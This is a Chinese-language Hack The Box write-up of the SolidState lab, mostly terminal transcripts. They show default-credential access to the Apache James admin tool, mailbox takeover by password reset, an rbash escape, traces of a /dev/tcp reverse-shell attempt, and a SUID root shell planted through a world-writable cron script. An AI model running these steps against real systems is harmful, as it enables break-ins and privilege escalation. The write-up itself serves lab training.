SolidState-htb-writeup

0x00 靶场技能介绍

章节技能:JAMES服务弱口令、nc连接登录邮箱管理后台、修改邮箱账号密码、ssh登录增加”bash –noprofile”登录、/proc/目录里查找-perm -0002 权限文件

参考链接:https://www.cnblogs.com/jarwu/p/17449447.html

参考链接:https://0xdf.gitlab.io/2020/04/30/htb-solidstate.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.51

2、扫描下开放端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.51       
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 09:45 CST
Nmap scan report for 10.10.10.51
Host is up (0.33s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds


┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,25,80,110,119,4555,  


┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,25,80,110,119,4555 -Pn --min-rate=10000 10.10.10.51 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 09:56 CST
Nmap scan report for 10.10.10.51
Host is up (0.30s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.4 [10.10.14.4])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.94SVN%I=7%D=1/4%Time=6596105A%P=aarch64-unknown-linux-
SF:gnu%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.
SF:3\.2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:
SF:\nPassword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.67 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -sU --min-rate=10000 -oG allports1 10.10.10.51              
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 10:15 CST
Warning: 10.10.10.51 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.51
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.51 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 74.58 seconds

3、可以看出来开放了多个端口,这里先看下80端口的服务

4、首页上没看出来什么,扫描下目录,看看有什么服务吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.51
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.51/_24-01-04_10-38-09.txt

Target: http://10.10.10.51/

[10:38:09] Starting: 
[10:38:24] 403 -  297B  - /.ht_wsr.txt                                      
[10:38:24] 403 -  300B  - /.htaccess.bak1                                   
[10:38:24] 403 -  300B  - /.htaccess.orig                                   
[10:38:24] 403 -  302B  - /.htaccess.sample
[10:38:24] 403 -  301B  - /.htaccess_extra                                  
[10:38:24] 403 -  298B  - /.htaccessBAK                                     
[10:38:24] 403 -  300B  - /.htaccess_orig
[10:38:24] 403 -  300B  - /.htaccess.save
[10:38:24] 403 -  298B  - /.htaccessOLD
[10:38:24] 403 -  299B  - /.htaccessOLD2
[10:38:24] 403 -  291B  - /.html                                            
[10:38:24] 403 -  290B  - /.htm
[10:38:24] 403 -  298B  - /.htaccess_sc
[10:38:25] 403 -  296B  - /.htpasswds                                       
[10:38:25] 403 -  300B  - /.htpasswd_test
[10:38:25] 403 -  297B  - /.httr-oauth
[10:38:40] 200 -    3KB - /about.html                                       
[10:39:09] 301 -  311B  - /assets  ->  http://10.10.10.51/assets/           
[10:39:09] 200 -  467B  - /assets/                                          
[10:39:46] 200 -  568B  - /images/                                          
[10:39:46] 301 -  311B  - /images  ->  http://10.10.10.51/images/           
[10:39:54] 200 -    6KB - /LICENSE.txt                                      
[10:40:24] 200 -  606B  - /README.txt                                       
[10:40:30] 403 -  300B  - /server-status/                                   
[10:40:30] 403 -  299B  - /server-status                           

Task Completed

5、这里其实什么也没有发现,说明切入点不是这里,而是在其他开放的端口上面

6、在端口扫描的结果,可以看出来4555端口类似让输入账号密码,我们百度下看看这个是什么服务信息

JAMES Remote Administration Tool 2.3.2

James是属于Apache的一个开源项目,是Apache组织构建的一个可移植的、安全的、100% 纯 Java 实现的企业级邮件服务器

7、可以知道是一个邮件服务器,并且在百度搜索中,还发现了该服务的默认密码,通过搜索,知道了一些修改密码的命令操作方法

已知root账号密码(默认账号root:root)

8、接下来,使用nc进行连接该4555端口服务,并修改相关账号的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
setpassword thomas 123
Password for thomas reset
setpassword john 123
Password for john reset
set password mindy 123
Unknown command set password mindy 123
setpassword mindy 123
Password for mindy reset
setpassword mailadmin 123
Password for mailadmin reset
quit
Bye

9、这里针对发现的账号,把密码都修改成123,然后我天真的以为可以尝试进行ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿kali)-[~/桌面]
└─$ ssh john@10.10.10.51                              
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.51' (ED25519) to the list of known hosts.
john@10.10.10.51's password: 
Permission denied, please try again.
john@10.10.10.51's password: 
Permission denied, please try again.
john@10.10.10.51's password: 
john@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh thomas@10.10.10.51
thomas@10.10.10.51's password: 
Permission denied, please try again.
thomas@10.10.10.51's password: 
Permission denied, please try again.
thomas@10.10.10.51's password: 
thomas@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: 
Permission denied, please try again.
mindy@10.10.10.51's password: 
Permission denied, please try again.
mindy@10.10.10.51's password: 
mindy@10.10.10.51: Permission denied (publickey,password).

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mailadmin@10.10.10.51
mailadmin@10.10.10.51's password: 
Permission denied, please try again.
mailadmin@10.10.10.51's password: 
Permission denied, please try again.
mailadmin@10.10.10.51's password: 
mailadmin@10.10.10.51: Permission denied (publickey,password).

10、到这里才明白,其实我修改的知识邮件服务上的账号密码,打靶机打迷糊了

11、通过百度的检索,知道了这里需要通过telnet进行连接110端口进行服务登录和邮件查看的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
john
-ERR
USER john
+OK
PASS 123
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

12、到这里发现了 mindy 这个账号是个关键账号,但是我前面有个账号james 这个账号没有重置密码,我再重置下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james 123
Password for james reset
setpassword mindy 123
Password for mindy reset
quit   
Bye

13、然后开始一个一个的账号登录,查看有什么邮件的重要信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
thomas
+OK
PASS 123
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER mindy
+OK
PASS 123
-ERR Authentication failed.
USER mailadmin
+OK
PASS 123
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER james
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
PASS 123
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(kali㉿kali)-[~/桌面]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER mindy
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
PASS 123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

14、最后还是在 mindy 账号下,发现了一个账号一个密码信息

username: mindy
pass: P@55W0rd1!2@

15、接下来开始使用ssh进行登录尝试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51                             
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <9152149.0.1704334325953.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.4 ([10.10.14.4])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 391
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Wed, 3 Jan 2024 21:11:25 -0500 (EST)
Date: Wed, 3 Jan 2024 21:11:25 -0500 (EST)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.4/443: Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <30321308.1.1704334457034.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.4 ([10.10.14.4])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 137
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Wed, 3 Jan 2024 21:13:36 -0500 (EST)
Date: Wed, 3 Jan 2024 21:13:36 -0500 (EST)
From: team@team.pl

: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.4/443: Connection refused
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$

16、程序上看的还是有些缺陷啊,但是不耽误我获取第一个flag信息

1
2
3
4
5
6
7
8
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ 
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt
4530ac8bfbfb86ba43deb1883dd0a48c
mindy@solidstate:~$

0x02 系统权限获取

17、这里开始坐牢式的信息,搜集,但是这命令确实的太难受了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
mindy@solidstate:~$ 
mindy@solidstate:~$ sudo -l
-rbash: sudo: command not found
mindy@solidstate:~$ ls -la
total 28
drwxr-x--- 4 mindy mindy 4096 Apr 26  2021 .
drwxr-xr-x 4 root  root  4096 Apr 26  2021 ..
lrwxrwxrwx 1 root  root     9 Nov 18  2020 .bash_history -> /dev/null
-rw-r--r-- 1 root  root     0 Aug 22  2017 .bash_logout
-rw-r--r-- 1 root  root   338 Aug 22  2017 .bash_profile
-rw-r--r-- 1 root  root  1001 Aug 22  2017 .bashrc
drwxr-x--- 2 mindy mindy 4096 Apr 26  2021 bin
-rw------- 1 root  root     0 Aug 22  2017 .rhosts
-rw------- 1 root  root     0 Aug 22  2017 .shosts
drw------- 2 root  root  4096 Apr 26  2021 .ssh
-rw------- 1 mindy mindy   33 Jan  3 20:42 user.txt
mindy@solidstate:~$ cd bin
-rbash: cd: restricted
mindy@solidstate:~$ ls -la bin/
total 8
drwxr-x--- 2 mindy mindy 4096 Apr 26  2021 .
drwxr-x--- 4 mindy mindy 4096 Apr 26  2021 ..
lrwxrwxrwx 1 root  root     8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root  root     8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root  root     7 Aug 22  2017 ls -> /bin/ls
mindy@solidstate:~$ ls -la .ssh
ls: cannot open directory '.ssh': Permission denied
mindy@solidstate:~$ ss -ltn
-rbash: ss: command not found
mindy@solidstate:~$ ls -la /home
total 16
drwxr-xr-x  4 root  root    4096 Apr 26  2021 .
drwxr-xr-x 22 root  root    4096 May 27  2022 ..
drwxr-xr-x 16 james osboxes 4096 Apr 26  2021 james
drwxr-x---  4 mindy mindy   4096 Apr 26  2021 mindy
mindy@solidstate:~$ ls -la /home/james
total 80
drwxr-xr-x 16 james osboxes 4096 Apr 26  2021 .
drwxr-xr-x  4 root  root    4096 Apr 26  2021 ..
lrwxrwxrwx  1 root  root       9 Apr 26  2021 .bash_history -> /dev/null
-rw-r--r--  1 james osboxes  220 Jun 18  2017 .bash_logout
-rw-r--r--  1 james osboxes 3526 Jun 18  2017 .bashrc
drwx------  8 james osboxes 4096 Apr 26  2021 .cache
drwx------ 10 james osboxes 4096 Apr 26  2021 .config
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Desktop
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Documents
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Downloads
drwx------  3 james osboxes 4096 Apr 26  2021 .gnupg
-rw-------  1 james osboxes  640 Aug 22  2017 .ICEauthority
drwxr-xr-x  3 james osboxes 4096 Apr 26  2021 .local
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Music
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 .nano
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Pictures
-rw-r--r--  1 james osboxes  675 Jun 18  2017 .profile
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Public
drwx------  2 james osboxes 4096 Apr 26  2021 .ssh
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Templates
drwxr-xr-x  2 james osboxes 4096 Apr 26  2021 Videos
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ cd 
-rbash: cd: restricted
mindy@solidstate:~$ cd /home/james/.config
-rbash: cd: restricted
mindy@solidstate:~$ ls -la /home/james/.config
ls: cannot open directory '/home/james/.config': Permission denied
mindy@solidstate:~$ exit
logout
Connection to 10.10.10.51 closed.

18、通过百度,我发现在ssh登录的时候使用 bash –noprofile 参数,就不会出现这个问题了

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/桌面]
└─$ ssh mindy@10.10.10.51 "bash --noprofile"
mindy@10.10.10.51's password: 
sh -i
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

19、这是参考演示报告,通过 find 查找发现了一个特殊的 py 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -0002 -type f -print 2</dev/null | grep -v /proc/
<m -0002 -type f -print 2</dev/null | grep -v /proc/  
/opt/tmp.py
/sys/fs/cgroup/memory/cgroup.event_control
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

https://explainshell.com/explain?cmd=find+%2F+-perm+-0002+-type+f+-print+2%3C%2Fdev%2Fnull+%7C+grep+-v+%2Fproc%2F

20、而该文件是可以写入的,这里我们自己写一个提权的命令,就可以提权了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 1 Jan  3 22:32 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "#!/usr/bin/env python" > /opt/tmp.py
<state:~$ echo "#!/usr/bin/env python" > /opt/tmp.py  
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "import os,sys" >> /opt/tmp.py
<y@solidstate:~$ echo "import os,sys" >> /opt/tmp.py  
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo "os.system('cp /bin/sh /home/mindy/sh && chmod 4777 /home/mindy/sh')" >> /opt/tmp.py
<y/sh && chmod 4777 /home/mindy/sh')" >> /opt/tmp.py  
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os,sys
os.system('cp /bin/sh /home/mindy/sh && chmod 4777 /home/mindy/sh')
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
ls
bin  sh  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./sh 
./sh
# id
id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)

21、然后查看 flag信息

1
2
3
4
# cat /root/root.txt
cat /root/root.txt
1c71cc60d8c95d36754538002c346606
#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/85

打靶记
#shooting-range
SolidState-htb-writeup
https://sh1yan.top/2024/01/04/SolidState-htb-writeup/
作者
shiyan
发布于
2024年1月4日
许可协议